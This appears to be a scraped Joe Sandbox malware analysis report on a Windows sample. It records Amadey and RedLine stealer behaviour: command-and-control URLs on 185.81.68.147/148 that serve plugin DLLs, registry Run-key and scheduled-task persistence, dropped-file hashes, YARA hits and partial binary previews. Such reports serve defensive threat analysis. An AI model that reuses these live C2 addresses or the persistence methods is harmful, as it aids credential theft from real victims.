                                                                                                                    http://185.81.68.148/Fvu5jh4DbS/index.phprundll32.exe, 0000001D.00000002.3377277785.000000000328F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3378440733.00000000033DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001F.00000002.2524411157.000002E536162000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2524332986.0000021990BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://185.81.68.147/7vhfjke3/Plugins/cred64.dll$Gxtuum.exe, 00000014.00000002.3380715534.0000000000D60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1grundll32.exe, 00000016.00000002.2680605134.000001ED586C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: malware
                                                                                                                        unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://185.81.68.147/7vhfjke3/Plugins/clip64.dllGxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://tempuri.org/Entity/Id5ResponseD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://185.81.68.147/7vhfjke3/index.php.0Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://tempuri.org/Entity/Id15ResponseDD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://tempuri.org/Entity/Id10ResponseD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://word.office.comonexplorer.exe, 00000004.00000000.2052790919.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.00000000099B0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://185.81.68.148/8Fvu5jh4DbS/index.phpodeduGxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://185.81.68.148/arundll32.exe, 00000016.00000002.2680605134.000001ED586C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RenewD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://go.t.com/fwlink/?Li955powershell.exe, 00000020.00000002.2604795771.00000219A8BBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    http://tempuri.org/Entity/Id8ResponseD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://185.81.68.148/8Fvu5jh4DbS/index.php)rundll32.exe, 00000016.00000002.2679991024.000001ED567B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2006/02/addressingidentityD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://185.81.68.147/7vhfjke3/index.phpR0Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://schemas.microexplorer.exe, 00000004.00000000.2051826790.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3422880933.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3464363955.0000000008890000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://tempuri.org/:hardwares.D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002A8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://tempuri.org/DD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/06/addressingexD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://crl.thawte.com/ThawteTimestampingCA.crl0CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                185.81.68.147
                                                                                                                                                                unknownFinland
                                                                                                                                                                50108KLNOPT-ASFItrue
                                                                                                                                                                185.81.68.148
                                                                                                                                                                unknownFinland
                                                                                                                                                                50108KLNOPT-ASFItrue
                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                Analysis ID:1574171
                                                                                                                                                                Start date and time:2024-12-13 01:36:05 +01:00
                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                Overall analysis duration:0h 12m 57s
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:full
                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                Number of analysed new started processes analysed:44
                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                                Technologies:
                                                                                                                                                                • HCA enabled
                                                                                                                                                                • EGA enabled
                                                                                                                                                                • AMSI enabled
                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Sample name:yINR7uQlPr.exe
                                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                                Original Sample Name:1bbc3bff13812c25d47cd84bca3da2dc.exe
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal100.phis.troj.spyw.evad.winEXE@76/87@0/2
                                                                                                                                                                EGA Information:
                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                HCA Information:
                                                                                                                                                                • Successful, ratio: 71%
                                                                                                                                                                • Number of executed functions: 133
                                                                                                                                                                • Number of non-executed functions: 302
                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
                                                                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                01:37:00AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe
                                                                                                                                                                01:37:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe
                                                                                                                                                                01:37:26Task SchedulerRun new task: Gxtuum path: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                19:36:56API Interceptor5358x Sleep call for process: msiexec.exe modified
                                                                                                                                                                19:36:56API Interceptor5364x Sleep call for process: audiodg.exe modified
                                                                                                                                                                19:36:56API Interceptor332014x Sleep call for process: explorer.exe modified
                                                                                                                                                                19:37:27API Interceptor1853x Sleep call for process: Gxtuum.exe modified
                                                                                                                                                                19:37:33API Interceptor73x Sleep call for process: D7AB.tmp.ssg.exe modified
                                                                                                                                                                19:37:40API Interceptor47x Sleep call for process: powershell.exe modified
                                                                                                                                                                19:38:12API Interceptor2532x Sleep call for process: rundll32.exe modified
                                                                                                                                                                19:38:17API Interceptor39x Sleep call for process: ssg.exe modified
                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                185.81.68.147file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                • 185.81.68.147/tizhyf/gate.php?0CD020845398340779059
                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                                • 185.81.68.147/tizhyf/gate.php?2DB3A69DE7692371543510
                                                                                                                                                                No context
                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                KLNOPT-ASFIfile.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                • 185.81.68.147
                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                                • 185.81.68.147
                                                                                                                                                                tjpq0h4wEH.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                • 185.81.68.147
                                                                                                                                                                file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                • 185.81.68.115
                                                                                                                                                                file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                • 185.81.68.115
                                                                                                                                                                file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                • 185.81.68.115
                                                                                                                                                                LxYpBRhMBx.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                • 185.81.68.115
                                                                                                                                                                file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                • 185.81.68.115
                                                                                                                                                                file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                • 185.81.68.115
                                                                                                                                                                file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                • 185.81.68.115
                                                                                                                                                                KLNOPT-ASFIfile.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                • 185.81.68.147
                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                                • 185.81.68.147
                                                                                                                                                                tjpq0h4wEH.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                • 185.81.68.147
                                                                                                                                                                file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                • 185.81.68.115
                                                                                                                                                                file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                • 185.81.68.115
                                                                                                                                                                file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                • 185.81.68.115
                                                                                                                                                                LxYpBRhMBx.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                • 185.81.68.115
                                                                                                                                                                file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                • 185.81.68.115
                                                                                                                                                                file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                • 185.81.68.115
                                                                                                                                                                file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                • 185.81.68.115
                                                                                                                                                                No context
                                                                                                                                                                No context
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3293
                                                                                                                                                                Entropy (8bit):5.3364558769830905
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqc85Vsql:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qp
                                                                                                                                                                MD5:1255FDF0A9A1C19092A78046C2B3B108
                                                                                                                                                                SHA1:869678412F6D9879B84D57DCA18E46F986F173B5
                                                                                                                                                                SHA-256:B6F9DDE82E514AB4C6A9DF4EB8A3EF7694C5A82D0CACE9FDA1318FD70359F58E
                                                                                                                                                                SHA-512:55C29CAF8C13614F9E8EB5C7D9A2C1BCD180D6A7200693A74AFAFC7C092C7329865A10B82B46FE668B3FB13C43EDAEB60F0CBF64498BF984D4688CF9D5999AD9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3293
                                                                                                                                                                Entropy (8bit):5.3364558769830905
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqcEsq35D:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qh
                                                                                                                                                                MD5:CD2726EE4EEF3843D6673734B77A3E0A
                                                                                                                                                                SHA1:AA537CC06CEF4CC75B6FF7CDC9B38F0660158717
                                                                                                                                                                SHA-256:2C554F3CCAFF7C559620FAF795CCCE1A01CE92A914B3CDFBF12A98F8E88FAA40
                                                                                                                                                                SHA-512:0ECCAAFB069D24EBC67C53E89821ED5F7FC32A752FAAF9FB4B2A99D2A6A480FF09C3B537AF01C6DCA31AD01C4143A074FDFB846BBE74D0F111F60DAB414780D5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):308224
                                                                                                                                                                Entropy (8bit):6.27479026130529
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:Y2J31coxDzgqSAy3/wLZRYa2dWSS8ySQIaTgHJ0tYRV4OeJiqbQ5rF4:71coxDzgxAKILIa2d1S8ySQIaTpjKrF4
                                                                                                                                                                MD5:DD1E3F38AE7711D270748012AF613950
                                                                                                                                                                SHA1:B3B90EEC3507F523AA63802CC16E5248C8EF0EA8
                                                                                                                                                                SHA-256:2997292293C332E73B11FA28126B6FBEFEA75A6BB02001EB017DE46797D4E4EC
                                                                                                                                                                SHA-512:0EFF0CBA972B6622FB59683FE4D15D1B6C1EF106166189F60DCD7B4C76B6CEB82FD5C71433DC61394F03EFF03575F2BE27DEC6AC8AB064491710263879B11BCA
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a\.i%=.:%=.:%=.:,EJ:&=.:%=.:&=.:JKr:-=.:JKC:$=.:JKD:$=.:Rich%=.:................PE..d...<zZg.........."......:...*......\4.........@..........................................@.................................................@h..(.......(.......@....................................................................P.. ............................text....9.......:.................. ..`.rdata.......P.......>..............@..@.data........p......................@....pdata..@............X..............@..@.rsrc...(............\..............@..@.x64.....`.......T...`..................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):126976
                                                                                                                                                                Entropy (8bit):6.36076412023942
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3072:Vdu5ZXB8ZuzQT7SgmME8Yn/YoZ3SNqpidU1epf:WjGymSg7E8Y3Z3AdUwpf
                                                                                                                                                                MD5:C2F3FBBBE6D5F48A71B6B168B1485866
                                                                                                                                                                SHA1:1CD56CFC2DC07880B65BD8A1F5B7147633F5D553
                                                                                                                                                                SHA-256:C7ED512058BC924045144DAA16701DA10F244AC12A5EA2DE901E59DCE6470839
                                                                                                                                                                SHA-512:E211F18C2850987529336E0D20AA894533C1F6A8AE6745E320FD394A9481D3A956C719AC29627AFD783E36E5429C0325B98E60AEE2A830E75323C276C72F845A
                                                                                                                                                                Malicious:true
                                                                                                                                                                Yara Hits:
                                                                                                                                                                • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll, Author: Joe Security
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P...................................................................@......@......@.~.....@......Rich............................PE..L.....Zg...........!.....D..........bp.......`...............................0............@.....................................P.......................................8...............................@............`..L............................text....C.......D.................. ..`.rdata..*u...`...v...H..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):307712
                                                                                                                                                                Entropy (8bit):5.081279904923014
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3072:acZqf7D34kp/0+mA0kywMlQEg85fB1fA0PuTVAtkxzy3RMeqiOL2bBOA:acZqf7DIcnGCQNB1fA0GTV8kU0L
                                                                                                                                                                MD5:7B6730CA4DA283A35C41B831B9567F15
                                                                                                                                                                SHA1:92EF2FD33F713D72207209EC65F0DE6EEF395AF5
                                                                                                                                                                SHA-256:94D7D12AE53CE97F38D8890383C2317CE03D45BD6ECAF0E0B9165C7066CD300C
                                                                                                                                                                SHA-512:AE2D10F9895E5F2AF10B4FA87CDB7C930A531E910B55CD752B15DAC77A432CC28ECA6E5B32B95EEB21E238AAF2EB57E29474660CAE93E734D0B6543C1D462ACE
                                                                                                                                                                Malicious:true
                                                                                                                                                                Yara Hits:
                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ssg[1].exe, Author: Joe Security
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H(...............0.................. ... ....@.. ....................... ............@.................................<...O.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B................p.......H....... ...............(w..............................................a.u.t.o.f.i.l.l.5.t.Y.W.R.q.a.W.V.o.a.m.h.h.a.m.J.8.W.W.9.y.b.2.l.X.Y.W.x.s.Z.X.Q.K.a.W.J.u.Z.W.p.k.Z.m.p.t.b.W.t.w.Y.2.5.s.c.G.V.i.a.2.x.t.b.m.t.v.Z.W.9.p.a.G.9.m.Z.W.N.8.V.H.J.v.b.m.x.p.b.m.s.K.a.m.J.k.Y.W.9.j.b.m.V.p.a.W.l.u.b.W.p.i.a.m.x.n.Y.W.x.o.Y.2.V.s.Z.2.J.l.a.m.1.u.a.W.R.8.T.m.l.m.d.H.l.X.Y.W.x.s.Z.X.Q.K.b.m.t.i.a.W.h.m.Y.m.V.v.Z.2.F.l.Y.W.9.l.a.G.x.l.Z.m.5.r.b.2.R.i.Z.W.Z.n.c.G.d.r.b.m.5.8.T.W.
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1281024
                                                                                                                                                                Entropy (8bit):6.466046469058072
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:BO//kL3TtMhQsnoXyajMK8fCZEqcAxQBuLv8YPKpTG:z3pMhQzRM3MfcAxHv8t
                                                                                                                                                                MD5:C6AABB27450F1A9939A417E86BF53217
                                                                                                                                                                SHA1:B8EF3BB7575139FD6997379415D7119E452B5FC4
                                                                                                                                                                SHA-256:B91A3743C7399AEE454491862E015EF6FC668A25D1AA2816E065A86A03F6BE35
                                                                                                                                                                SHA-512:E5FE205CB0F419E0A320488D6FA4A70E5ED58F25B570B41412EBD4F32BBE504FF75ACB20BFEA22513102630CF653A41E5090051F20AF2ED3AADB53CE16A05944
                                                                                                                                                                Malicious:true
                                                                                                                                                                Yara Hits:
                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll, Author: Joe Security
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........D........................s.................................................X..........Rich...........................PE..d.....Zg.........." .........8...............................................P............`..........................................~..X....~....... .......`...............0..l.......p...........................p...8............................................text............................... ..`.rdata..............................@..@.data............D..................@....pdata.......`......................@..@_RDATA...............t..............@..@.rsrc........ .......v..............@..@.reloc..l....0.......x..............@..B........................................................................................................................................................................................
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1504
                                                                                                                                                                Entropy (8bit):5.274324154700206
                                                                                                                                                                Encrypted:false
